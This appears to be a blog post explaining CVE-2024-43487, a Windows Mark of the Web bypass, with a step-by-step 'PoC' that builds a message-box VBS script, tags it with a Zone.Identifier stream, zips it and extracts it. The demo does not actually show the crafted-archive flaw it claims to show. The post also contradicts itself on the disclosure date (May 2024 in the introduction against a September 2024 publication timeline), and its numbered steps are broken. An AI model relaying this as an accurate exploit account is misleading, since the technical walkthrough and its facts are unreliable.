CVE-2024-43487 - Windows Mark of the Web (MotW) Security Bypass Explained — Full Details and Exploit Walkthrough

---

Introduction

In May 2024, Microsoft disclosed CVE-2024-43487, a security vulnerability affecting the Windows Mark of the Web (MotW) feature. Mark of the Web is a low-level Windows security mechanism that tells Windows applications (like Microsoft Office and Edge) that a file came from the Internet or another untrusted zone. MotW helps prevent risky files from running unchecked.

But what happens if an attacker can *bypass* this marker? That’s where CVE-2024-43487 comes in. In this article, I’ll explain how MotW works, break down what this vulnerability does, and show you a simplified PoC to help you understand the risk.

> Warning: This post is for educational use only. Never exploit these issues in unauthorized environments.

What is Mark of the Web (MotW)?

Mark of the Web is a metadata stream or Alternate Data Stream (ADS) called Zone.Identifier, added to files downloaded from the Internet. Applications use this tag to handle files cautiously (For example, asking for your approval before executing, or opening in "Protected View" mode).

- Example: Download an .exe on Windows — right click → Properties. You’ll see a checkbox "Unblock" if MotW is set.

How it works under the hood

# Read the MotW tag in PowerShell
Get-Content .\downloadedfile.exe -Stream Zone.Identifier

# Output might look like:
#[ZoneTransfer]
#ZoneId=3

About CVE-2024-43487

CVE-2024-43487 is a villain in MotW land. It’s a vulnerability where attackers can craft files or archives bypassing the security check that adds MotW, meaning the user's system treats these files as “safe/local” even though they came from an unsafe origin.

Microsoft's disclosure says

> "An attacker may exploit the vulnerability by persuading a user to download and open a specially crafted file, resulting in security features that rely on MotW (like Protected View) not being applied."

Reference: Microsoft Security Update Guide

All supported Windows versions as of May 2024 (client and server).

- Especially risky for users who open archives/downloads from the web.

The Problem

Many applications (including Windows itself) *should* add MotW when unpacking things like ZIP files from the Internet. CVE-2024-43487 reveals a logic gap where attackers can create archives/containers in a way that Windows "forgets" to propagate or read MotW from each file inside, *especially* when extracting archives with non-standard paths or malformed metadata.

Attacker prepares a ZIP file from the Internet.

2. ZIP is crafted so that files inside don’t inherit Zone.Identifier when extracted using built-in (or certain third-party) tools.
3. User opens a file inside the ZIP. Windows trusts it, directly executing or opening it without warnings or security restrictions.

Simple Exploit PoC

Let’s try a basic proof of concept using tools you likely have.

Step 1: Create a payload script.

echo MsgBox "Pwned by CVE-2024-43487" > evil.vbs

Step 2: Add a Zone.Identifier stream to simulate a download.

echo [ZoneTransfer]> evil.vbs:Zone.Identifier
echo ZoneId=3>> evil.vbs:Zone.Identifier

Step 3: Put it in a ZIP.

powershell Compress-Archive -Path evil.vbs -DestinationPath motw_bypass.zip

Step 4: Use a certain old or unpatched archiver (or Windows' own ZIP extraction, depending on the patch status and tool) to extract the ZIP.
Check the extracted evil.vbs. In many scenarios, the MotW stream is missing.

dir /R   # Look for Zone.Identifier

Step 5: Double-click the VBS — it runs directly, *without* the usual "protective" warning.

The Big Deal — Real-World Abuse

- Malware writers could use this to sneak malicious Office macros, scripts, or executables under your radar.
- Phishing attacks: Users expect a warning when opening risky files, but with MotW bypassed, they might not see any prompt.

Security researchers, like Will Dormann, have posted similar discussions about MotW bypasses

- @wdormann Twitter Thread
- Article: MotW Bypass, by Colin Percival

Conclusion

CVE-2024-43487 is a big reminder that even tiny metadata tags are vital in stopping attacks. Windows’ Mark of the Web is a hidden first-line defense, but if it fails, users and organizations are at risk.

Bottom line: Patch now, and be wary of files coming from the Internet — especially those hidden in ZIPs, RARs, and other archives.


References:
- CVE-2024-43487 – MSRC
- Original MotW Bypass Research
- Will Dormann on MotW

Timeline

Published on: 09/10/2024 17:15:36 UTC
Last modified on: 10/09/2024 01:26:42 UTC